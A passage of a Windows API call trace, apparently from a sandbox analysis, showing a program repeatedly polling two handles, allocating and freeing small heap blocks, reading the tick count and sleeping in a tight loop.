Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.162] GetTickCount () returned 0x20bee1a [0187.162] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.162] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.167] GetTickCount () returned 0x20bf6c0 [0187.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.167] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.167] GetTickCount () returned 0x20bf6c0 [0187.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87870 [0187.167] GetTickCount () returned 0x20bf6c0 [0187.167] GetTickCount () returned 0x20bf6c0 [0187.167] GetTickCount () returned 0x20bf6c0 [0187.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87870 | out: hHeap=0x2150000) returned 1 [0187.167] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.168] GetTickCount () returned 0x20bf6c0 [0187.168] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88260 [0187.168] GetTickCount () returned 0x20bf6c0 [0187.168] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88260 | out: hHeap=0x2150000) returned 1 [0187.168] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.171] GetTickCount () returned 0x20bff56 [0187.171] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.171] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.171] GetTickCount () returned 0x20bff56 [0187.171] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878d0 [0187.171] GetTickCount () returned 0x20bff56 [0187.171] GetTickCount () returned 0x20bff56 [0187.171] GetTickCount () returned 0x20bff56 [0187.171] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878d0 | out: hHeap=0x2150000) returned 1 [0187.172] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.172] GetTickCount () returned 0x20bff56 [0187.172] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88260 [0187.172] GetTickCount () returned 0x20bff56 [0187.172] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88260 | out: hHeap=0x2150000) returned 1 [0187.172] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.175] GetTickCount () returned 0x20c07ec [0187.175] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0187.175] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.175] GetTickCount () returned 0x20c07ec [0187.175] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c90 [0187.175] GetTickCount () returned 0x20c07ec [0187.175] GetTickCount () returned 0x20c07ec [0187.175] GetTickCount () returned 0x20c07ec [0187.175] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c90 | out: hHeap=0x2150000) returned 1 [0187.175] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.175] GetTickCount () returned 0x20c07ec [0187.175] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ed0 [0187.175] GetTickCount () returned 0x20c07ec [0187.175] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ed0 | out: hHeap=0x2150000) returned 1 [0187.175] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0187.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.178] GetTickCount () returned 0x20c1082 [0187.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0187.178] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.178] GetTickCount () returned 0x20c1082 [0187.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.178] GetTickCount () returned 0x20c1082 [0187.178] GetTickCount () returned 0x20c1082 [0187.178] GetTickCount () returned 0x20c1082 [0187.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.178] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.179] GetTickCount () returned 0x20c1082 [0187.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.179] GetTickCount () returned 0x20c1082 [0187.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0187.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.184] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.184] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c60 [0187.184] GetTickCount () returned 0x20c1928 [0187.184] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c60 | out: hHeap=0x2150000) returned 1 [0187.184] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.190] GetTickCount () returned 0x20c21be [0187.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0187.190] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.190] GetTickCount () returned 0x20c21be [0187.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.190] GetTickCount () returned 0x20c21be [0187.190] GetTickCount () returned 0x20c21be [0187.190] GetTickCount () returned 0x20c21be [0187.190] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.190] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.190] GetTickCount () returned 0x20c21be [0187.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88020 [0187.190] GetTickCount () returned 0x20c21be [0187.190] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88020 | out: hHeap=0x2150000) returned 1 [0187.190] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0187.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.193] GetTickCount () returned 0x20c2a54 [0187.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.193] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.193] GetTickCount () returned 0x20c2a54 [0187.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.193] GetTickCount () returned 0x20c2a54 [0187.193] GetTickCount () returned 0x20c2a54 [0187.193] GetTickCount () returned 0x20c2a54 [0187.193] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f00 | out: hHeap=0x2150000) returned 1 [0187.194] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.194] GetTickCount () returned 0x20c2a54 [0187.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b10 [0187.194] GetTickCount () returned 0x20c2a54 [0187.194] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b10 | out: hHeap=0x2150000) returned 1 [0187.194] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.198] GetTickCount () returned 0x20c32f9 [0187.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0187.198] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.198] GetTickCount () returned 0x20c32f9 [0187.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.198] GetTickCount () returned 0x20c32f9 [0187.198] GetTickCount () returned 0x20c32f9 [0187.198] GetTickCount () returned 0x20c32f9 [0187.198] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.198] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.199] GetTickCount () returned 0x20c32f9 [0187.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88230 [0187.199] GetTickCount () returned 0x20c32f9 [0187.199] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88230 | out: hHeap=0x2150000) returned 1 [0187.199] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0187.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0187.202] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f90 [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f90 | out: hHeap=0x2150000) returned 1 [0187.202] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.202] GetTickCount () returned 0x20c3b8f [0187.202] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.202] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0187.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.205] GetTickCount () returned 0x20c4425 [0187.205] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0187.205] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.205] GetTickCount () returned 0x20c4425 [0187.205] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87780 [0187.205] GetTickCount () returned 0x20c4425 [0187.205] GetTickCount () returned 0x20c4425 [0187.205] GetTickCount () returned 0x20c4425 [0187.205] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87780 | out: hHeap=0x2150000) returned 1 [0187.205] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.206] GetTickCount () returned 0x20c4425 [0187.206] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b10 [0187.206] GetTickCount () returned 0x20c4425 [0187.206] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b10 | out: hHeap=0x2150000) returned 1 [0187.206] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0187.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.209] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f00 | out: hHeap=0x2150000) returned 1 [0187.209] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e70 [0187.209] GetTickCount () returned 0x20c4cbb [0187.209] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e70 | out: hHeap=0x2150000) returned 1 [0187.209] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.214] GetTickCount () returned 0x20c5561 [0187.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0187.215] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879c0 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e879c0 | out: hHeap=0x2150000) returned 1 [0187.215] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87900 [0187.215] GetTickCount () returned 0x20c5561 [0187.215] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87900 | out: hHeap=0x2150000) returned 1 [0187.215] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0187.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.221] GetTickCount () returned 0x20c5df7 [0187.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0187.222] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ae0 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ae0 | out: hHeap=0x2150000) returned 1 [0187.222] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.222] GetTickCount () returned 0x20c5df7 [0187.222] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.222] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0187.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.225] GetTickCount () returned 0x20c668d [0187.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0187.225] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.225] GetTickCount () returned 0x20c668d [0187.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87810 [0187.225] GetTickCount () returned 0x20c668d [0187.225] GetTickCount () returned 0x20c668d [0187.225] GetTickCount () returned 0x20c668d [0187.225] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87810 | out: hHeap=0x2150000) returned 1 [0187.225] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.225] GetTickCount () returned 0x20c668d [0187.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ff0 [0187.225] GetTickCount () returned 0x20c668d [0187.225] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ff0 | out: hHeap=0x2150000) returned 1 [0187.225] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0187.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.230] GetTickCount () returned 0x20c6f32 [0187.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0187.230] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88290 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88290 | out: hHeap=0x2150000) returned 1 [0187.231] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87960 [0187.231] GetTickCount () returned 0x20c6f32 [0187.231] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87960 | out: hHeap=0x2150000) returned 1 [0187.231] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0187.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0187.234] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ff0 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ff0 | out: hHeap=0x2150000) returned 1 [0187.234] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87720 [0187.234] GetTickCount () returned 0x20c77c8 [0187.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87720 | out: hHeap=0x2150000) returned 1 [0187.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0187.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.238] GetTickCount () returned 0x20c805e [0187.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.238] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.238] GetTickCount () returned 0x20c805e [0187.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a20 [0187.238] GetTickCount () returned 0x20c805e [0187.238] GetTickCount () returned 0x20c805e [0187.238] GetTickCount () returned 0x20c805e [0187.238] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a20 | out: hHeap=0x2150000) returned 1 [0187.239] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.239] GetTickCount () returned 0x20c805e [0187.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.239] GetTickCount () returned 0x20c805e [0187.239] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.239] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0187.242] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e40 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e40 | out: hHeap=0x2150000) returned 1 [0187.242] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87870 [0187.242] GetTickCount () returned 0x20c8904 [0187.242] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87870 | out: hHeap=0x2150000) returned 1 [0187.242] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0187.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.246] GetTickCount () returned 0x20c919a [0187.246] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0187.246] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.247] GetTickCount () returned 0x20c919a [0187.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87750 [0187.247] GetTickCount () returned 0x20c919a [0187.247] GetTickCount () returned 0x20c919a [0187.247] GetTickCount () returned 0x20c919a [0187.247] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87750 | out: hHeap=0x2150000) returned 1 [0187.247] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.247] GetTickCount () returned 0x20c919a [0187.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a20 [0187.247] GetTickCount () returned 0x20c919a [0187.247] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a20 | out: hHeap=0x2150000) returned 1 [0187.247] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0187.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.252] GetTickCount () returned 0x20c9a30 [0187.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0187.252] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.252] GetTickCount () returned 0x20c9a30 [0187.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.252] GetTickCount () returned 0x20c9a30 [0187.253] GetTickCount () returned 0x20c9a30 [0187.253] GetTickCount () returned 0x20c9a30 [0187.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.253] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.253] GetTickCount () returned 0x20c9a30 [0187.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d50 [0187.253] GetTickCount () returned 0x20c9a30 [0187.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87d50 | out: hHeap=0x2150000) returned 1 [0187.253] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0187.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.285] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ed0 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] GetTickCount () returned 0x20ca2e5 [0187.285] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ed0 | out: hHeap=0x2150000) returned 1 [0187.285] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.285] 